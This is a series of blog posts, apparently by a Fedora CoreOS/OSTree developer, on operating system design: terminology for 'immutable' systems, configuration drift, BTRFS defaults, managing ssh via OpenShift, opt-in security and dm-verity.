“Immutable” → reprovisionable, anti-hysteresis

This is going to be a longer blog entry, but here’s a TL;DR:

I propose that instead of "immutable" or "read-only" when talking about operating systems (such as Fedora CoreOS, Google COOS, Flatcar etc.), we use these terms:

  • "fully managed": The system does not have "unmanaged state" – e.g. an admin interactively doing ssh and making changes not recorded declaratively somewhere else
  • "image based": Traditional package managers end up with a lot of "hidden state" (related to above); image based updates avoid that
  • "reprovisionable" and not a "pet": I don’t like the industry "pets vs cattle" term, and I think "reprovisionable" is both nicer and more descriptive
  • "Has anti-hysteresis properties": (Yes I know this is an awkward term) See https://en.wikipedia.org/wiki/Hysteresis – I’ll talk more about this later

(Terminology note: In this article also I will use the abbreviation "pkgmgrs" for "traditional package managers like apt/yum". Systems like NixOS and some aspects of swupd from Clear Linux improve parts of what I’m talking about, but this article is already really long and a detailed comparison including those really deserves a separate post)

Why not "immutable"/"read-only"?

Because it’s very misleading. These system as a whole is not immutable, or read-only, or stateless – there are writable, persistent data areas. And more importantly, those writable data areas allow persistently storing privileged code. They have to because these OSes need to support:

  • the user being root on their own computer
  • In place OS updates

(What about systems that don’t support "in place" updates? Yes, there are people/organizations who e.g. build a new cloud image for every change, and often don’t even enable ssh or any persistent writable state for the OS. This is fine, but one problem is it doesn’t generally apply outside of cloud/IaaS environments on e.g. bare metal machines, and it can make upgrades for small changes very disproportionately expensive. )

Back to operating systems with state that some people call "immutable":

But /usr is read-only!

Yes. And this does have some security benefits, e.g. this runc vulnerability isn’t exploitable.

But in order for the operating system to be updated in place, there must be some writable area to add new OS content – so it’s not immutable. The details of this vary; a number of "image based" operating systems use dual partitions, OSTree is based on hardlinking with a "hidden" writable data store.

The real reason to have a read-only /usr is to make clear that the content of that directory (the operating system binaries) are "fully managed" or "owned" by the OS creator – you shouldn’t try to overwrite or replace parts of it because those changes could be overwritten by a future update.

And this "changes in /usr being overwritten" is a real existing problem with traditional package-manager systems (pkgmgrs). For example, a while ago I was looking at Keylime and came across this bit in the installer. That change would be silently overwritten by the next yum/apt update, so the system administrator experience would be:

  • Provision system
  • Install things (including keylime)
  • ⌛ Time passes
  • Apply OS updates (not on by default), then keylime breaks for a not obvious reason

The more correct thing instead would be for that playbook to write a systemd drop in in /etc to override just ExecStart=, although even doing that is fragile and what’d be best here is to make this an explicitly configurable option for tpm2-abrmd in a config file in /etc.

The overall point is that the reason /usr read-only is primarily to enforce that user configuration is cleanly separate from the OS content – which becomes particularly important when OS updates are automatic by default, as they are in Fedora CoreOS.

I think having automatic updates on by default fundamentally changes the perception of responsibility around updates; if I’m a system administrator and I typed apt/yum update and things broke, it’s my fault, but if automatic updates are on by default and I’m doing something else and the machine just falls over – it’s the OS vendor’s fault. Linking these two together: Since Fedora CoreOS has automatic updates on, we really need to be clear what’s our responsibility and what’s yours.

Now, this isn’t a new problem, and most people maintaining systems know not to do the kinds of things that Keylime Ansible playbook is doing. But it’s an extremely easy mistake to make without strong discipline when /usr is sitting there writable by any process that runs as root. I’ve seen many, many examples of this.

Nothing actually stops traditional package managers from mounting /usr read-only by default – they could do the equivalent of unshare -m /bin/sh -c 'mount -o remount,rw /usr && apt update‘ internally. But the challenges there grow into adjusting the rest of the filesystem layout to handle a readonly /usr, such as how OSTree suggests moving /usr/local to /var/usrlocal etc.

Image based updates

Usually instead of talking about an "immutable" system that allows in place updates, it’d be more useful and accurate to say "image based".

And this gets into another huge difference between traditional package managers and image based systems: The amount of "internal state".

The way most package managers work is when you type $pkgmgr install foo, the fact that you want foo installed is recorded by adding it to the database. But the package manager database also includes a whole set of "base packages" that (usually) you didn’t choose. Those "base packages" might come from a base container when you podman/docker pull, for cloud images the default image, and physical systems they often come from a distribution-specific default list embedded/downloaded from the ISO or equivalent.

A problem with this model then is "drift" – by default if the distribution decides to add a package to the base set by default, you (usually) don’t get it by default when applying in place updates since most package managers just update the set of packages you have. One solution to this is metapackages, but if not everything in the base is covered you still have drift that can be hard to notice over time.

I think for users of many pkgmgrs this "initial state" is hard to disentangle from things you typically do care about like the packages you chose to install. There is e.g. apt-mark showmanual and dnf history userinstalled commands.

And…trying that out by pulling the docker.io/debian:stable image, it claims:

# apt-mark showmanual
iproute2
iputils-ping
#

And that’s the first command I ran in the image! Clearly a bug somewhere. For the fedora:32 base image it lists a bunch of packages that correspond to the bits in the base kickstart – but that’s not something I as the user wrote.

By analogy with /usr vs /etc – this is like mixing local configuration in /usr.

This problem extends beyond the "user installed" database: traditional package managers aren’t aware of the "base bootimage" which operates on a separate infrastructure layer. apt has no idea about the of the OpenStack image/AMI/qcow2 or whatever that formed its initial state, nor is it aware of the OCI/docker container initial image (and conversely, e.g. podman/docker have no idea that yum/apt etc. are running inside).

So over time, the state of the system with traditional pkgmgrs is a function of many things:

  • Which packages you chose to install (obviously)
  • The set of packages from the initial "bootimage" or container image
  • More subtle things like which packages are in the "user installed" database
  • Even more subtle things can happen when weak dependencies like Recommends change in upstream packages
  • The package manager version: RHEL8 yum has autoremove on by default, RHEL7 and older yum doesn’t

One solution to this type of "drift" is to not use packages at all (pure "base OS" + "apps/containers") like Google COOS, or to group things at a higher level (Clear Linux is more in this bucket).

I’m pretty happy though with the design we came up with for rpm-ostree used by Fedora CoreOS/Silverblue/IoT; there is a clear "base commit" that comes in OSTree format, and you can add packages on top – recasting RPMs as "operating system extensions" (see also this OpenShift enhancement).

For rpm-ostree it’s really simple – by default it operates in pure ostree mode by default, so if you don’t layer/override any packages you are exactly replicating an ostree commit – and that’s it! You don’t need to think about packages by default.

Particularly for Fedora CoreOS, there is almost nothing in the "bootimage" (ISO, AMI equivalent) that isn’t part of the ostree commit.

In other words, "state of installed software" is a function of (effectively) one thing by default:

  • The ostree commit

It’s even stronger than that really, it’s not just "same packages" it’s "bit for bit identical /usr filesystem". However, there is one important note: /boot does come from the bootimage, see this issue.

Bootloader aside, effectively all of the OS state you care about then does not depend on which bootimage you happend to use to install initially. When OSTree performs an update, it does not matter what the "previous" commit was – the old and new implicitly share files via the hardlink store, but updates always involve a "fresh checkout" of the new commit. Every upgrade is like a fresh OS install of that version with your configuration (/etc) and state (/var) re-applied.

With rpm-ostree being a hybrid system, you can choose to engage package layering (or overrides). But the system very clearly highlights that list; note a major simplification is combining the "packages you installed" and "user installed" lists. The rpm-ostree model is very simple: you have a "base commit/image" and your extensions. For example:

$ rpm-ostree status -b
State: idle
BootedDeployment:
● ostree://fedora/32/x86_64/silverblue
                   Version: 32.2 (2020-08-22T17:28:53Z)
                BaseCommit: 080312021f34c7763089ff12fcd2964647e0f55ac3981f869b56d232a33990f6
           LayeredPackages: fish libvirt tmux virt-manager

An important but subtle detail in achieving this simplification: by default, rpm-ostree doesn’t allow marking a base package as user installed. Generally the idea is that removing user-interesting packages from the base image is something you shouldn’t do.

rpm-ostree goes to some lengths internally to make this split happen; the libdnf/rpm layers don’t have any model of "base image" because everything’s a package to them.

Has anti-hysteresis properties

I know "has anti-hysteresis properties" is an awkward phrase (and I’m happy to hear alternatives) but I think hysteresis is a great term that we should start using in computing. Today it seems to mostly be used in the sciences but I propose adopting it – this in the spirit of making computer science more like a real science.

Let’s take a look specifically at elastic hysteresis because it’s easy to understand and even try at home.

Basically, rubber bands have "hysteresis" ("hidden state"/"memory") which comes from how much it was stretched in the past. And this state is basically impossible to see by just looking at the rubber band. For a related example with rubber, see the two balloon experiment.

To tie together the previous section on package managers with this:

Systems managed by traditional package managers (apt/yum/etc) have a lot of effective hysteresis. I think even many experienced system administrators would have trouble confidently and precisely explaining how the multiple things listed above (the container or IaaS base image, package manager user installed database, etc.) all interact in forming the final state of the system over time as in-place upgrades are applied.

Configuration management systems and hysteresis

This "hysteresis" problem occurs not just in package managers but also many configuration management systems (puppet/ansible/etc).

A simple example I’ve seen happen is where the system administrator writes a playbook (or equivalent) that does e.g.:

- name: Allow nopasswd for wheel
  lineinfile:
    path: /etc/sudoers
    state: present
    regexp: '^%wheel ALL='
    line: '%wheel ALL=(ALL) NOPASSWD: ALL'

Then later, say the organization wants to change to use a separate group instead of wheel, say admins or whatever.

If the playbook is changed in git to do:

- group:
    name: admin
    state: present
- name: Allow nopasswd for admins
  lineinfile:
    path: /etc/sudoers
    state: present
    regexp: '^%admin ALL='
    line: '%admin ALL=(ALL) NOPASSWD: ALL'

The previous change to modify wheel in /etc/sudoers will silently persist (until the system is reprovisioned). And that could become a security problem even in this case.

In most of these configuration management systems, in some cases the admin may need to explicitly add a change which reverts a prior change, and then makes the new change. But not all of the time – some (most) changes don’t need this.

It’s an easy mistake to make when writing effectively arbitrary code to change files in persistent filesystems.

Hence, configuration management systems are subject to hysteresis too, and I think many of them could do better in warning users about this, and pushing for better practices. For example, the playbook would be more "anti-hysteresis" if it wrote to /etc/sudoers.d/mycustom.conf which gets replaced entirely, though /etc/sudoers.d is only supported by relatively modern sudo I think.

Kubernetes is fairly opinionated in having code in container images you pull (equivalent of /usr), and storing configuration in a configmap (which would get projected into environment variables or files in /etc). When you update a deployment, all state in the (sadly writable by default) pod container filesystem is thrown away, and there’s also no leakage from any previous version of a configmap. So we could say that the Kubernetes approach to applications has strong "anti-hysteresis properties".

The OpenShift Machine Config Operator defaults to anti-hysteresis

Tying together the Kubernetes and operating system threads: in OpenShift 4, the machine-config-operator allows you to write config files and systemd units into the operating system /etc by using kubectl/oc. (The original goal of etcd was in fact to do this, then Kubernetes happened and the focus shifted to that layer. In OpenShift 4 we are meeting that original goal of storing the Unix /etc in etcd via the MCO.)

The reason I claim the MCO has "anti-hysteresis" is it keeps track of the old and new system states reliably and is able to diff them. For example, if you write a config file for chrony to set the timeserver, then later kubectl delete machineconfig/my-chrony-config since you’re fine with the default, the MCO will notice that the old config wrote /etc/chrony.conf and the new one doesn’t, and it will correctly revert the file back to the default.

Just like OSTree has a checksum describing the state of /usr, the MCO maintains a checksum for its state and when you look at a node, you can say its configuration is e.g. rendered-master-<checksum>. If a system can describe its state with a checksum, that implies it has strong anti-hysteresis properties.

Now, there are holes in this model. If for example instead of writing a file directly, you create a systemd unit which does e.g. ExecStart=/bin/echo somedata > /etc/someotherfile, and you later delete that unit – the file will persist. The reason why relates to this FAQ.

A general pattern here is that any place you have arbitrary code that changes over time writing to persistent files, you’re at risk of hysteresis (or "unmanaged state").

Reprovisionable

OK, so systems with anti-hysteresis properties are good. But in practice, I think there’s always going to be that small amount of "unmanaged state" that sneaks in even in organizations with strong discipline. For example, a system administrator trying to debug one node and using ssh to edit a file directly to increase the debug level of a service, and then later that causes a problem by flooding the log system or causing more I/O to the local filesystem and increasing latency for other services.

And this problem isn’t just at the operating system layer; at the IaaS/CaaS layer it’s easy to have VMs or containers that were created manually to debug something and then "leak" unless actively removed.

In an IaaS deployment there are a wide variety of objects in general (storage buckets, SaaS etc.) and equally many tools to deal with leaks at that level; usually this boils down to a "resource tagging" approach. (One thing I think is nice about GCP over e.g. AWS is the "project" approach, specifically this bit: "This model can also be useful for testing purposes: once you’re done with a project, you can delete the project, and all of the resources created by that project will be deleted as well.")

At the operating system level (and at the IaaS level if you can too), I think a good way to deal with this is to periodically reprovision, e.g. once a month (if you can do faster, great) on a rolling basis. In OpenShift 4 for example with the machine-api-operator that would just be a small amount of code (a custom controller running as a pod) to periodically kubectl delete machine/<somemachine> based on whatever criteria you want – the platform will handle the rest, spinning up a new one to take its place. Currently this only applies to workers but I hope we can cover the control plane in future releases. A neat thing about this is that the IaaS layer (virtual machines) are just Kubernetes custom resources that are managed via the cluster.

Conclusion: We want reprovisonable, anti-hysteresis systems

There a whole lot of current terms for what I’ve covered above, "gitops", "managed configuration", "cattle", stateless", "immutable infrastructure" etc. I’m suggesting the goal is: reprovisionable infrastructure with anti-hysteresis properties. But, I’d also be happy if we used "reprovisionable" instead of "cattle", and also if we introduced the term "anti-hysteresis" instead of "immutable" (where applicable).

On BTRFS

There’s been a lot of discussion on this proposed Fedora change for Workstation to use BTRFS.

First off, some background: I reprovision my workstation about every 2-3 months to avoid it becoming too much of a "pet". I took the opportunity for this reprovision to try out BTRFS again (it’d been years).

Executive summary

BTRFS should be an option, even an emphasized one. It probably shouldn’t be the default for Workstation, and shouldn’t be a default beyond that for server use cases (e.g. Fedora CoreOS).

Why are there multiple Linux filesystems?

There are multiple filesystems in the Linux kernel for good reasons. It’s basically impossible to optimize for all use cases at once, and there are fundamental tradeoffs to make. BTRFS in particular has a lot of features…and those features have costs. Not every use case needs those features, and the costs can be close to prohibitive for things like databases.

BTRFS is good for "pet" systems

There is this terminology in the industry of pets vs cattle – I once saw a talk that proposed "elephants vs ants" instead which is more appealing. Lately I tend to use "disposable" or "reprovisionable" for the second term.

I mentioned above I reprovision my workstation periodically, but it’s still somewhat of a "pet". I don’t have everything in config management yet (and probably never will); I change things often enough that it’s hard to commit to 100% discipline to record every change in git instead of just running a CLI or writing a file. But I have all the important stuff. (And I take backups of data separately of course.)

For people who don’t have much in configuration management – the server or desktop system that has years of individually built up changes (whether from people doing things manually over ssh or interactively via a GUI like Cockpit, being able to take a filesystem snapshot of things is an extremely compelling feature.

Another great BTRFS-style use case is storing data like your photos on a local drives instead of uploading them to the cloud, etc.

The BTRFS cost

Those features though come at a cost. And this back to the "pets" vs "disposable" systems and where the "source of truth" is. For users managing disposable systems, the source of truth isn’t the Unix filesystem – it’s most likely a form of GitOps. Or take the case of Kubernetes – it’s a cluster with the primary source being etcd.

And of course people are using storage systems like PostgreSQL or Ceph for data, or an object storage system.

The important thing to see here is that in these cases, the "source of truth" isn’t a single computer (a single Unix filesystem) – it’s a distributed cluster.

For all these databases, performance is absolutely critical. They don’t need the underlying filesystem to do much other than pass through writes to disk, because they are already managing things like duplication/checksumming/consistency at a higher level.

As most BTRFS users know (or have discovered the hard way) you really need to use nodatacow for these – effectively "turning off" a lot of BTRFS features.

Another example: virtual machine images which is an interesting one because the "pet" vs "disposable" discussion here becomes recursive – is the VM a pet or disposable, etc.

Not worth paying for reprovisionable systems

For people who manage "reprovisionable" systems, there’s usually not much value using BTRFS for things like operating system data or /etc (they can just blow it away and reprovision), and a clear cost where they need to either use nodatacow on the things that do matter (losing a lot of the BTRFS features for that data), or explicitly use e.g. xfs/ext4 for them, going back into a world of managing "mixed" storage.

In particular, I would strongly argue against defaulting to BTRFS for Fedora CoreOS because we are explicitly pushing people away from creating these types of "pet" systems.

To say this another way, I’ve seen some Internet discussion about this read the proposed change as applying beyond Fedora Workstation, and that’s wrong.

But if you e.g. want to use BTRFS anyways for Fedora CoreOS (perhaps using a separate subvolume for /var where persistent container data is stored) that would be mounted with nodatacow for things etcd that could make sense! We are quite close to finishing root filesystem reprovisioning in Ignition.

But a great option if you know you want/need it!

As I mentioned above, my workstation (FWIW a customized Silverblue-style system) is a seems like a nearly ideal use case for BTRFS. I’m not alone in that! I’m likely going to roll with it for a few months until the next reprovisioning time unless I hit some stumbling blocks.

However, I am already noticing the Firefox UI periodically lock up for seconds at a time, which wasn’t happening before. Since I happen to know Firefox uses SQLite (which like the other databases mentioned above, conflicts with btrfs), I tried this and yep:

walters@toolbox> find ~/.mozilla/ -type f -exec filefrag {} \; | grep -Ee '[0-9][0-9][0-9]+ extents found'
firefox/xxxx.default-release/storage/.../xxxx.sqlite: 1825 extents found
...

And that’s only a few days old! (I didn’t definitively tie the UI lockups to that, but I wouldn’t be surprised. I’d also hope Firefox isn’t writing to the database on the main thread, but I’m sure it’s hard for the UI to avoid blocking on some queries).

I just found this stackoverflow post with some useful tips around manually or automatically defragmenting but…it’s really difficult to say that all Fedora/Firefox users should need to discover this and make the difficult choice of whether they want BTRFS features or performance for individual files after the fact. Firefox upstream probably can’t unilaterally set the nodatacow option on their databases because some users might reasonably want consistent snapshots for their home directory. A lot of others though might use a separate backup system (or Firefox Sync) and much prefer performance, because they can just restore their browser state like bookmarks/history from backup if need be.

Random other aside: sqlite performance and f2fs

In a tangentially related "Linux filesystems are optimized for different things" thread, the f2fs filesystem mostly used by Android (AFAIK) has special APIs designed specifically for SQLite, because SQLite is so important to Android.

Conclusion

All Fedora variants are generic to a degree; I don’t think there will ever be just one Linux filesystem that’s the only sane choice. It makes total sense to have BTRFS as a prominent option for people creating desktops (and laptops and to a lesser degree servers).

The default however is an extremely consequential decision. It implies many years of dealing with the choice in later bug reports, etc. It really requires a true committment to that choice for the long term.

I’m not sure it makes sense to push even Linux workstation users towards a system that’s more "pet" oriented by default. How people create disposable systems (particularly for workstations) is a complex topic with a lot of tradeoffs; I’d love for the Fedora community to have more blog entries about this in the Magazine. One of those solutions might be e.g. using a BTRFS root and using send/receive to a USB drive for backups for example!

But others would be about the things I and others do to manage "disposable" systems: managing data in /home in git, using image systems like rpm-ostree for the base OS to replicate well known state instead of letting their package database be a "pet", storing development environment as a container image etc. Those work on any Unix filesystem without imposing any runtime cost. And that’s what I think most people provisioning new systems in 2020 should be doing.

Controlling ssh via kubectl

In a recent conversation, an OpenShift 4 administrator used the phrase “Because SSH is disabled in these AMIs…”.  But that’s not the right way to think about things!  With OpenShift 4, the goal is that all aspects of the operating system are controlled by the cluster and one can configure them in a uniform fashion “day 1” and “day 2” via kubectl/oc.

Let’s unpack this a bit more.  First, with Fedora/RHEL CoreOS, we have a high degree of uniformity for the base OS across platforms – for example, we avoid including any platform specific agents, and we also try really hard to have the OS work the same way across platforms because while we have different disk images per platform (unavoidable), we have exactly one in-place update stream that applies across all of them.

The state of having SSH enabled or not does not vary across platforms or “AMIs” – it works exactly the same on a bare metal OpenShift 4 install as it does in AWS.

Second, we use Ignition and the machine config operator as a uniform way to configure things – so if you want to enable or disable SSH or configure keys – it again works exactly the same across platforms.

Specifically, if you provide SSH public keys to the installer configuration that basically ends up generating an Ignition config that applies on firstboot – the “AMI” here isn’t relevant.

This part of “configure the OS via Ignition” is common to Fedora and RHEL CoreOS.  With OpenShift 4 we also have integrated “day 2” changes, so one can e.g. update SSH keys “day 2”.

To emphasize this, as an OpenShift 4 administrator, you manage your ssh keys via oc/kubectl –  the same way you manage other aspects of the cluster, and the same way across platforms.

Starting from open (and FOSS)

As our society becomes increasingly dependent on computing, the importance of security has only risen. From cities hit by ransomware attacks, to companies doing cutting edge research that are the targets of industrial espionage, to individuals attacked because they have a desirable social media handle or are famous – security is vital to all of us.

When I first got into Linux and FOSS, I have strong memories of the variety of things enabled by the flexibility it enabled. For example, the first year of college in my dorm room with 3 other people, we only had a shared phone line that we could use with a modem (yes, I’m old). A friend of a friend ended up setting up a PC Linux box as a NAT system, and the connection was certainly slow, but it worked. I think it ran Slackware. That left an impression on me. (Though the next year the school deployed Ethernet anyways)

Fast forward 20+ years, we have the rise of the cloud (and cheap routers and WiFi of course). But something also changed about Linux (and operating systems in general) in that time, and that’s the the topic of this post: “locked down” operating systems, of which the most notable here are iOS, Android and ChromeOS.

iOS in particular requires code signing – the operating system refuses to execute code not signed by Apple. And iOS devices can only run iOS of course.

ChromeOS is also a locked-down system by default: while it uses the Linux kernel, it also comes out of the box set up such that the base operating systems only runs the binary ChromeOS builds which come entirely from Google. This is implemented with dm-verity. Android also uses the Linux kernel and has a similar setup, although the story of who owns what is more complicated; a bit more on this below.

Now, ChromeOS has a documented developer mode – and in fact they’ve made this process easier than it used to be (previously it could require toggling a hardware switch, which also reset the device if I remember correctly). Android has documented bootloader unlocking, although (again as I understand it) many popular phones come locked.

In contrast to these types of systems we have the “traditional” Linux distributions, the BSDs, etc. Most Linux distributions are strongly associated with a “package manager” – which make it fast and easy to add software to your root filesystem.

The flip side of course, is it’s also fast and easy for malicious code to end up in your root filesystem (or home directory) if you’re running a vulnerable web browser or service, or you pull from untrusted sources, etc. Particularly if you aren’t diligent with upgrades.

Another way to look at this is – the ChromeOS docs talk about “installing Linux”. One the face of it, this sounds silly because ChromeOS is a Linux kernel…but it’s not the flexible Linux that I first encountered in college. It’s not the flexible Linux that people use to create custom devices.

I think we need to incrementally move the “mainstream” distributions closer to this model – while preserving the fundamental open nature of the system. This will not be easy, in practice a difficult balance to strike, but we can do it.

Partition (containerize/virtualize)

The mainstream default needs to be containers and virtual machines. This is obviously well understood, but doing it in practice is really an enormous shift from how “traditional” default Debian/RHEL/Slackware/Arch installs work.

In most of the Fedora documentation, it’s extremely common to reference sudo yum install.

Getting out of the mindset of routinely mutating your root filesystem is hard. For people used to a “traditional” Linux system, partitioning into containers and VMs is hard. Changing systems management tools to work in this model is extremely hard. But we need to do it.

On the server side the rise of Kubernetes increasingly does mean that containerization is the default. For OpenShift 4 we created a derivative of Fedora CoreOS in Red Hat Enterprise Linux CoreOS – I like to describe it as a “Kubernetes-native OS” in concert with the machine-config-operator.

For other use cases, we’re doing our best to push the ecosystem in this direction with Fedora CoreOS (container oriented server but not Kubernetes native; e.g. can be used standalone) and other projects like the desktop-focused Fedora Silverblue. (On the topic of partitioning the desktop, QubesOS is also doing interesting, mostly complementary work)

One of the biggest shifts to make particularly for desktop systems like Silverblue is to live inside a “pet container” system like toolbox.

When I see documentation that says yum install foo – I now default to doing that inside my toolbox container – or sometimes on a remote Kubernetes pod. This works well for CLI applications.

But remain open

What we’re not changing with Fedora CoreOS (or other projects) is a “default to open” model. We will not (by default) for example require code executing our your device be signed by us. Our source code and build systems are Free Software and will remain that way. We will continue to discuss and write patches in the open, and ensure that we’re continuing to build an operating system in open collaboration with our users.

Today for example, rpm-ostree supports easily replacing the kernel; you just rpm-ostree override replace /path/to/kernel.rpm. Also, the fact that it’s the same kernel package as “traditional” Fedora installs cannot be emphasized enough – it helps us sustain two different ways to consume the same OS content. We can’t just break non-containerized use cases overnight.

Further, while we continue to debate the role of package layering (rpm-ostree install) in Fedora CoreOS, one way to look at this is recasting RPMs as “operating system extensions”, much like Firefox extensions. If you want to rpm-ostree install fish (or e.g. PAM modules), you can do so.

Extending the OS (and replacing parts for testing/development) are first class operations and will remain so; doing so works in a similar way to traditional package systems. We aren’t requiring other shells or PAM modules to containerize somehow, as that would be at odds with keeping the experience first class and avoiding “two ways to do it”.

Finally, the coreos-assembler project makes it easy to do fully custom builds. Our focus of course is on providing a pre-built system that’s useful to users, but our build process is pretty easy to replicate and will remain so.

Not tied in with proprietary cloud infrastructure

Another thing that needs to be stated here is we will continue to make an operating system that is not tied into proprietary cloud infrastructure. Currently in this area besides update rollout infrastructure we ship a counting service – the backing service is fully open, and it’s easy to turn off. In contrast of course, ChromeOS for example comes set up such that the operating system accounts are the same as Google cloud accounts.

Adding opt-in security

All of the above said; there are a lot of powerful benefits from the “locked down” operating system. I’ve been thinking recently about how we can enable this type of thing while “staying true to our roots”.

One thing that’s probably an ingredient of this is the fs-verity work which is also being driven by the ChromeOS/Android use case. They are hitting issues with the inflexibility of dm-verity; per these slides – “Intractable complexity when dealing with the Android partner ecosystem”. We can see the manifestation of this looking at the new Android APKX files – basically, there’s a need for 3rd parties to distribute privileged code. Currently APKX are loopback-mounted ext4 images with dm-verity, which is quite ugly.

fs-verity would mesh much more nicely with OSTree (which has always operated purely at the filesystem level) and other tools. (Update: Since I drafted this blog post a while ago I did get around to experimenting with fs-verity).

I haven’t yet gotten around to writing an fedora-coreos-tracker issue for this – but I think a proposal would be something like built-in functionality that allows you to opt-in to a model where after the OS has booted and Ignition runs, no further privileged code not signed by a keychain including the OS vendor’s key or your keys could execute. We’d ensure that the configuration in /etc was also part of a verified chain; since even if /usr is signed and verity protected, malware could persist in a systemd unit in /etc otherwise. Some people would probably want an “emergency ssh” shell that bypassed this; others would not (perhaps the default would be that anyone who didn’t want “emergency ssh” could simply disable the sshd.service unit). And note that we’d have to either have e.g. .bashrc included in the signature chain, or more likely ignored by default.

For Silverblue, one thing I’ve been thinking about is ensuring that the user flow works well without sudo by default. If you want to become root, you need to type Ctrl-Alt-Del (like Windows NT) and that switches you to a separate VT. The reason is that compromise of the user account with sudo privileges is really the same as a root compromise. You can’t trust your terminal emulators or display (aside: QubesOS approaches this by running everything in VMs with labeled borders and avoiding doing much on the host at all by default). We need to have a default “safe key” exactly like the single button on an iPhone always takes you to the home screen – allows you to make changes, and applications can’t intercept or control that key.

To reiterate, we need to more strongly separate the privileged OS content from your applications (containers/Flatpaks) and development tools by default. But at the same time we should continue allowing the operating system to truly be owned by you should you so choose. It’s your hardware.

Most important: apply security updates by default

As alluded to above: I think one of the most important things we can do for security is simply getting to a world where security updates (especially for the operating system/root filesystem) are applied automatically by default. That is of course the bold move that Container Linux did, and we will be preserving that with Fedora CoreOS.

This blog is focused on the base OS, but when applications are containerized it also is usually much easier to keep them updated too.

Doing automatic updates like that is much more tenable if it’s decoupled from core applications, and also if it’s fully transactional/safe as rpm-ostree enables.

We’ve already released OpenShift 4 which is strongly container oriented and contains an opinionated and streamlined way to update the OS together with the cluster, and includes transactional updates for the OS. There’s also an enhancement for automatic updates in progress. Fedora CoreOS work is progressing too – I’m excited to see where we take all of this in 2020!

systemd is really well designed

One of the things I think has generally worked well about “Linux” and the ecosystem on top of it has been the variety of userspace.  There’s obviously some pointless things, but also some genuine innovation.  It works well when upstream projects are structured in a way that they can be mixed and matched.

For Fedora CoreOS we are combining two technologies; Ignition and rpm-ostree.  Previously they were used independently (Ignition with a ChomeOS style A/B updater) and rpm-ostree with the traditional Fedora-and-derivatives setup of Kickstart for bare metal, and cloud-init for clouds.

Putting the two together has been working well so far, but I’ve recently been working on support for root filesystem reprovisioning which is where the two projects intersect strongly.  This has meant a lot of time writing code in the initramfs.

And the topic of this blog is “systemd is well designed” because the design for systemd in the initramfs is very flexible and also well documented.  We’re continuing to support Ignition independent of OSTree, as well as OSTree independent of Ignition, while also having both of them work together.  Further, the projects are written in different languages; Ignition is Go, OSTree is C, we have the usual (unfortunate) mix of shell script in there, and it’s likely we’ll add some Rust soon too.

This is where systemd excels; we can plug these things together in a coordinated fashion by writing unit files with careful dependencies.  They can communicate however they want; in practice, writing files in /run is a common pattern.

Also worth noting is we’re using dracut, which is itself independent of systemd, designed to just implement the systemd boot sequence – our units plug into the “custom initrd services” section.  And it all Just Worked.  The systemd initramfs boot sequence (and the boot sequence in general) was designed long before either OSTree or Ignition were created, but it’s stood the test of time.

OpenShift 4: Streamlining RHEL as Kubernetes-native OS

Been a while since I’ve blogged here, going to try to do so more often!  For quite a while now in the CoreOS group at Red Hat I’ve been part of a team working to create RHEL CoreOS, the cluster-managed operating system that forms a base of the just-released OpenShift 4.

With OpenShift 4 and RHEL CoreOS, we have created a project called machine-config-operator – but I like to think of it as the “RHEL CoreOS operator”.  This is a fusion of technologies that came from the CoreOS acquisition (Container Linux, Tectonic) along with parts of RHEL Atomic Host, but with a lot of brand new code as well.

What the MCO (machine-config-operator) does is pair with RHEL CoreOS to manage operating system updates as well as configuration in a way that makes the OS feel like a Kubernetes component.

This is a radically different approach than the OpenShift 3.x days, where the mental model was to provision + configure the OS (and container runtime), then provision a cluster on top.   With OpenShift 4 using RHCOS and the MCO, the cluster controls the OS.

If you haven’t yet, I encourage you to dive right in and play around with some of the example commands from the docs as well as examples from the upstream repository.  There is also my Devconf.cz 2019 talk (slightly dated now).

The release of 4.1 of course is just a beginning – there’s a whole lot more to do to bridge the worlds of the “traditional” operating system and Kubernetes/OpenShift.  For example, in git master of the MCO (for the next release after 4.1) we landed support for kernel arguments.  I think it’s quite cool to be able to e.g. oc edit machineconfig/50-nosmt, change the KernelArguments field in the MachineConfig CRD, add e.g. nosmt (or any other karg) and watch that change incrementally roll out across the cluster, reconciling the OS state just like any other Kubernetes object.

The links above have lots more detail for those interested in learning more – I’ll just link again operating system updates as I think that one is particularly interesting.

This release of OpenShift 4.1 is laying a powerful new foundation for things to come, and I’m really proud of what the teams have accomplished!

 

On dm-verity and operating systems

TL;DR: I posit that dm-verity is most useful if one is making a true fixed purpose device that has extremely limited configuration. If one allows installing (unprivileged) software, the protection is weaker. And if it’s an intentional design feature of the OS to allow persistently installing privileged software, the value of dm-verity plummets significantly.

I am one of the upstream maintainers of the ostree project which is comparable with projects that do A/B style partition updates for operating systems, although it’s implemented at the filesystem and not the block level. There’s a a bit more on related projects here.

We got a request to investigate dm-verity, and I wrote down some preliminary thoughts. However, since then I spent a while thinking about it, and the benefits/drawbacks of dm-verity.

As I mention in the TL;DR section, I’m going to claim that dm-verity is best when the machine/device has limited configuration (config files should not be arbitrary code) and no ability to install software. For example, take a “WiFi camera”. These types of devices are obviously in the news for security issues.

What can dm-verity do for appliance-type systems?

Let’s say the device’s web interface has a flaw that allows an attacker on the local network to gain code execution; for example, command injection. However, the device manufacturer has properly implemented dm-verity, and every persistent mount point is read-only and verity protected. This is a significant barrier to the attacker maintaining persistence across a reboot. Concretely, one could unplug the camera, plug it into a secure network, allow it to download an OS update fixing the vulnerability, and have some confidence the exploit hasn’t persisted.

However, even that said, there are limits to the value here. dm-verity does not help you with the attacker monitoring the camera and spying on you; for example if it has a view of one of your offices, it could be recording your typed passwords. Attackers could use it to launch attacks on other devices on the network until it’s been rebooted. This article gives an example of nation-state level malware that lived “in the network”, not persistently on disk; in order to remove it the organization had to reboot everything at the same time.

Dm-verity on non-appliance systems

The ChromeOS trusted boot design docs have a section titled “Known weaknesses of verified boot”:

While verified boot can ensure that the system image (i.e. firmware, kernel, root file system) are protected against tampering by attackers, it can’t protect data that must inherently be modifiable by a running system. This includes user data, but also system-wide state such as system configuration (network, time zone, keyboard layout, etc.)…

One very interesting thing here is the fundamental difference between the original ChromeOS design (a device to just run Chrome i.e. web pages, no 3rd party non-browser software at all) and Android, which is obviously all about “apps”. Modern Android does use dm-verity; as I understand it the ChomeOS and Android projects are trying to merge some technologies, which includes the OS update mechanism.

